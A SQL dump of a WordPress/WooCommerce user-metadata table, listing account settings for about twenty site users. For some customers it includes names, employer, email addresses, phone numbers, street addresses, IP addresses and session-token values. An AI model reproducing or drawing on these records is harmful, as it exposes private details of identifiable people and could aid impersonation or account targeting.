INSERT INTO `wp_usermeta` VALUES (23316, 1592, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (23317, 1592, '_yoast_wpseo_profile_updated', '1499340655'); 
INSERT INTO `wp_usermeta` VALUES (23318, 1592, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (23319, 1593, 'nickname', 'bdh11121967'); 
INSERT INTO `wp_usermeta` VALUES (23320, 1593, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23321, 1593, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23322, 1593, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (23323, 1593, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23324, 1593, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (23325, 1593, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (23326, 1593, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (23327, 1593, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23328, 1593, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (23329, 1593, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (23330, 1593, '_yoast_wpseo_profile_updated', '1499340977'); 
INSERT INTO `wp_usermeta` VALUES (23331, 1593, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (23332, 1594, 'nickname', 'reena'); 
INSERT INTO `wp_usermeta` VALUES (23333, 1594, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23334, 1594, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23335, 1594, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (23336, 1594, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23337, 1594, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (23338, 1594, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (23339, 1594, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (23340, 1594, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23341, 1594, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (23342, 1594, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (23343, 1594, '_yoast_wpseo_profile_updated', '1499344170'); 
INSERT INTO `wp_usermeta` VALUES (23344, 1594, 'session_tokens', 'a:1:{s:64:"891a8b9381c6197a022faa75661b3c1b401f7ff9a9f5ed24dbde55cd79046384";a:4:{s:10:"expiration";i:1500553785;s:2:"ip";s:13:"73.167.118.70";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1499344185;}}'); 
INSERT INTO `wp_usermeta` VALUES (23345, 1594, 'billing_first_name', 'Reena'); 
INSERT INTO `wp_usermeta` VALUES (23346, 1594, 'billing_last_name', 'Paink'); 
INSERT INTO `wp_usermeta` VALUES (23347, 1594, 'billing_company', 'SLIPS Technologies'); 
INSERT INTO `wp_usermeta` VALUES (23348, 1594, 'billing_email', 'reena@slipstechnologies.com'); 
INSERT INTO `wp_usermeta` VALUES (23349, 1594, 'billing_phone', '6175806319'); 
INSERT INTO `wp_usermeta` VALUES (23350, 1594, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (23351, 1594, 'billing_address_1', '85'); 
INSERT INTO `wp_usermeta` VALUES (23352, 1594, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (23353, 1594, 'billing_city', 'Cambridge'); 
INSERT INTO `wp_usermeta` VALUES (23354, 1594, 'billing_state', 'MA'); 
INSERT INTO `wp_usermeta` VALUES (23355, 1594, 'billing_postcode', '02140'); 
INSERT INTO `wp_usermeta` VALUES (23356, 1595, 'nickname', 'mphipps_esq1966'); 
INSERT INTO `wp_usermeta` VALUES (23357, 1595, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23358, 1595, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23359, 1595, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (23360, 1595, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23361, 1595, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (23362, 1595, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (23363, 1595, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (23364, 1595, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23365, 1595, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (23366, 1595, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (23367, 1595, '_yoast_wpseo_profile_updated', '1499345500'); 
INSERT INTO `wp_usermeta` VALUES (23368, 1595, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (23369, 1596, 'nickname', 'Kyle.brown1'); 
INSERT INTO `wp_usermeta` VALUES (23370, 1596, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23371, 1596, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23372, 1596, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (23373, 1596, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23374, 1596, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (23375, 1596, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (23376, 1596, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (23377, 1596, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23378, 1596, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (23379, 1596, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (23380, 1596, '_yoast_wpseo_profile_updated', '1499352085'); 
INSERT INTO `wp_usermeta` VALUES (23381, 1596, 'session_tokens', 'a:1:{s:64:"a67bb06a383e66eeb47d906632de28a54f0c90ba5162a68d3a12db3c8e74b577";a:4:{s:10:"expiration";i:1500561692;s:2:"ip";s:13:"64.222.178.33";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1499352092;}}'); 
INSERT INTO `wp_usermeta` VALUES (23382, 1597, 'nickname', 'brianesmithsmail1960'); 
INSERT INTO `wp_usermeta` VALUES (23383, 1597, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23384, 1597, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23385, 1597, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (23386, 1597, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23387, 1597, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (23388, 1597, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (23389, 1597, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (23390, 1597, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23391, 1597, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (23392, 1597, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (23393, 1597, '_yoast_wpseo_profile_updated', '1499352199'); 
INSERT INTO `wp_usermeta` VALUES (23394, 1597, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (23395, 1598, 'nickname', 'shanebaalham1972'); 
INSERT INTO `wp_usermeta` VALUES (23396, 1598, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23397, 1598, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23398, 1598, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (23399, 1598, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23400, 1598, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (23401, 1598, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (23402, 1598, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (23403, 1598, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23404, 1598, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (23405, 1598, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (23406, 1598, '_yoast_wpseo_profile_updated', '1499353337'); 
INSERT INTO `wp_usermeta` VALUES (23407, 1598, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (23408, 1599, 'nickname', 'JPoirier2'); 
INSERT INTO `wp_usermeta` VALUES (23409, 1599, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23410, 1599, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23411, 1599, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (23412, 1599, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23413, 1599, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (23414, 1599, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (23415, 1599, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (23416, 1599, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23417, 1599, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (23418, 1599, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (23419, 1599, '_yoast_wpseo_profile_updated', '1499354687'); 
INSERT INTO `wp_usermeta` VALUES (23420, 1599, 'session_tokens', 'a:1:{s:64:"3768e56fb5338bfe8410da1af108a03c50e4a73c46f77f07278ac02b2a22e6a6";a:4:{s:10:"expiration";i:1500564296;s:2:"ip";s:14:"65.153.125.177";s:2:"ua";s:69:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1499354696;}}'); 
INSERT INTO `wp_usermeta` VALUES (23421, 1600, 'nickname', 'davephp1997'); 
INSERT INTO `wp_usermeta` VALUES (23422, 1600, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23423, 1600, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23424, 1600, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (23425, 1600, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23426, 1600, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (23427, 1600, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (23428, 1600, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (23429, 1600, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23430, 1600, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (23431, 1600, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (23432, 1600, '_yoast_wpseo_profile_updated', '1499355379'); 
INSERT INTO `wp_usermeta` VALUES (23433, 1600, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (23434, 1601, 'nickname', 'purchasing5'); 
INSERT INTO `wp_usermeta` VALUES (23435, 1601, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23436, 1601, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23437, 1601, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (23438, 1601, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23439, 1601, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (23440, 1601, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (23441, 1601, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (23442, 1601, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23443, 1601, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (23444, 1601, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (23445, 1601, '_yoast_wpseo_profile_updated', '1499355594'); 
INSERT INTO `wp_usermeta` VALUES (23446, 1601, 'session_tokens', 'a:1:{s:64:"ca623aa2e5ee6523e44a5a5550e1f09c803ab71ad06cc26ec33e5f2ace9975ff";a:4:{s:10:"expiration";i:1500565202;s:2:"ip";s:12:"73.186.97.51";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0";s:5:"login";i:1499355602;}}'); 
INSERT INTO `wp_usermeta` VALUES (23447, 1601, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (23448, 1602, 'nickname', 'Vincent.Giammaria'); 
INSERT INTO `wp_usermeta` VALUES (23449, 1602, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23450, 1602, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23451, 1602, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (23452, 1602, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23453, 1602, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (23454, 1602, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (23455, 1602, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (23456, 1602, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23457, 1602, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (23458, 1602, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (23459, 1602, '_yoast_wpseo_profile_updated', '1499358235'); 
INSERT INTO `wp_usermeta` VALUES (23460, 1602, 'session_tokens', 'a:1:{s:64:"3db89833d6e3c5b8af025226f898adde88590f793f95ab68a3a4b6739006cbb6";a:4:{s:10:"expiration";i:1500567854;s:2:"ip";s:13:"152.132.11.65";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1499358254;}}'); 
INSERT INTO `wp_usermeta` VALUES (23461, 1603, 'nickname', 'linda_blackmore1966'); 
INSERT INTO `wp_usermeta` VALUES (23462, 1603, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23463, 1603, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23464, 1603, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (23465, 1603, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23466, 1603, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (23467, 1603, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (23468, 1603, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (23469, 1603, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23470, 1603, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (23471, 1603, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (23472, 1603, '_yoast_wpseo_profile_updated', '1499363137'); 
INSERT INTO `wp_usermeta` VALUES (23473, 1603, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (23474, 1604, 'nickname', 'sickle301967'); 
INSERT INTO `wp_usermeta` VALUES (23475, 1604, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23476, 1604, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23477, 1604, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (23478, 1604, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23479, 1604, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (23480, 1604, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (23481, 1604, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (23482, 1604, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23483, 1604, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (23484, 1604, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (23485, 1604, '_yoast_wpseo_profile_updated', '1499364323'); 
INSERT INTO `wp_usermeta` VALUES (23486, 1604, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (23487, 1605, 'nickname', 'dww19451969'); 
INSERT INTO `wp_usermeta` VALUES (23488, 1605, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23489, 1605, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23490, 1605, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (23491, 1605, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23492, 1605, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (23493, 1605, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (23494, 1605, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (23495, 1605, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23496, 1605, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (23497, 1605, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (23498, 1605, '_yoast_wpseo_profile_updated', '1499364754'); 
INSERT INTO `wp_usermeta` VALUES (23499, 1605, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (23500, 1606, 'nickname', 'gomezmarcelo251975'); 
INSERT INTO `wp_usermeta` VALUES (23501, 1606, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23502, 1606, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23503, 1606, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (23504, 1606, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23505, 1606, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (23506, 1606, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (23507, 1606, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (23508, 1606, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23509, 1606, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (23510, 1606, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (23511, 1606, '_yoast_wpseo_profile_updated', '1499377131'); 
INSERT INTO `wp_usermeta` VALUES (23512, 1606, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (23513, 1607, 'nickname', 'cuens1950'); 
INSERT INTO `wp_usermeta` VALUES (23514, 1607, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23515, 1607, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23516, 1607, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (23517, 1607, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23518, 1607, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (23519, 1607, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (23520, 1607, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (23521, 1607, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23522, 1607, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (23523, 1607, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (23524, 1607, '_yoast_wpseo_profile_updated', '1499392440'); 
INSERT INTO `wp_usermeta` VALUES (23525, 1607, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (23526, 1608, 'nickname', 'sillycamo1974'); 
INSERT INTO `wp_usermeta` VALUES (23527, 1608, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23528, 1608, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23529, 1608, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (23530, 1608, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23531, 1608, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (23532, 1608, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (23533, 1608, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (23534, 1608, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23535, 1608, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (23536, 1608, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (23537, 1608, '_yoast_wpseo_profile_updated', '1499400413'); 
INSERT INTO `wp_usermeta` VALUES (23538, 1608, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (23539, 1609, 'nickname', 'lderouaux1993'); 
INSERT INTO `wp_usermeta` VALUES (23540, 1609, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23541, 1609, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23542, 1609, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (23543, 1609, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23544, 1609, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (23545, 1609, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (23546, 1609, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (23547, 1609, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23548, 1609, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (23549, 1609, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (23550, 1609, '_yoast_wpseo_profile_updated', '1499403499'); 
INSERT INTO `wp_usermeta` VALUES (23551, 1609, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (23552, 1610, 'nickname', 'rktmn1952'); 
INSERT INTO `wp_usermeta` VALUES (23553, 1610, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23554, 1610, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23555, 1610, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (23556, 1610, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23557, 1610, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (23558, 1610, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (23559, 1610, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (23560, 1610, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23561, 1610, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (23562, 1610, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (23563, 1610, '_yoast_wpseo_profile_updated', '1499425952'); 
INSERT INTO `wp_usermeta` VALUES (23564, 1610, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (23565, 1611, 'nickname', 'playermatic1965'); 
INSERT INTO `wp_usermeta` VALUES (23566, 1611, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23567, 1611, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (23568, 1611, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (23569, 1611, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23570, 1611, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (23571, 1611, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (23572, 1611, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (23573, 1611, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23574, 1611, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (23575, 1611, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (23576, 1611, '_yoast_wpseo_profile_updated', '1499433695'); 
INSERT INTO `wp_usermeta` VALUES (23577, 1611, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (23578, 1612, 'nickname', 'alex.cozens'); 
INSERT INTO `wp_usermeta` VALUES (23579, 1612, 'first_name', 'Alex'); 
INSERT INTO `wp_usermeta` VALUES (23580, 1612, 'last_name', 'Cozens'); 
INSERT INTO `wp_usermeta` VALUES (23581, 1612, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (23582, 1612, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23583, 1612, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (23584, 1612, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (23585, 1612, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (23586, 1612, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23587, 1612, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (23588, 1612, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (23589, 1612, '_yoast_wpseo_profile_updated', '1499440313'); 
INSERT INTO `wp_usermeta` VALUES (23590, 1612, 'session_tokens', 'a:1:{s:64:"179728a265247db0875937b2c7b6da2243747ef338c9d05da08770908db5fee1";a:4:{s:10:"expiration";i:1500649930;s:2:"ip";s:10:"23.141.0.5";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1499440330;}}'); 
INSERT INTO `wp_usermeta` VALUES (23591, 1612, 'last_update', '1499440354'); 
INSERT INTO `wp_usermeta` VALUES (23592, 1613, 'nickname', 'kuhndawn'); 
INSERT INTO `wp_usermeta` VALUES (23593, 1613, 'first_name', 'Dawn'); 
INSERT INTO `wp_usermeta` VALUES (23594, 1613, 'last_name', 'Kuhn'); 
INSERT INTO `wp_usermeta` VALUES (23595, 1613, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (23596, 1613, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23597, 1613, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (23598, 1613, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (23599, 1613, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (23600, 1613, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (23601, 1613, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (23602, 1613, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (23603, 1613, '_yoast_wpseo_profile_updated', '1499441557'); 
INSERT INTO `wp_usermeta` VALUES (23604, 1613, 'session_tokens', 'a:2:{s:64:"b5a05ae71547af54d1cf9b5f325874757da7ff10b5cb8f194d8a6374c213ff29";a:4:{s:10:"expiration";i:1500651166;s:2:"ip";s:10:"35.8.27.83";s:2:"ua";s:69:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1499441566;}s:64:"e4e63955943f66a64939e75da3be7062b2574cc118790ec89e391a1fde9c0fcd";a:4:{s:10:"expiration";i:1499614446;s:2:"ip";s:10:"35.8.27.83";s:2:"ua";s:69:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1499441646;}}'); 
INSERT INTO `wp_usermeta` VALUES (23605, 1613, 'billing_first_name', 'Dawn'); 
INSERT INTO `wp_usermeta` VALUES (23606, 1613, 'billing_last_name', 'Kuhn'); 
INSERT INTO `wp_usermeta` VALUES (23607, 1613, 'billing_company', 'Michigan State University'); 
INSERT INTO `wp_usermeta` VALUES (23608, 1613, 'billing_email', 'kuhndawn@chemistry.msu.edu'); 
INSERT INTO `wp_usermeta` VALUES (23609, 1613, 'billing_phone', '517-353-1102'); 
INSERT INTO `wp_usermeta` VALUES (23610, 1613, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (23611, 1613, 'billing_address_1', '578 S Shaw Lane'); 
INSERT INTO `wp_usermeta` VALUES (23612, 1613, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (23613, 1613, 'billing_city', 'East Lansing'); 
INSERT INTO `wp_usermeta` VALUES (23614, 1613, 'billing_state', 'MI'); 
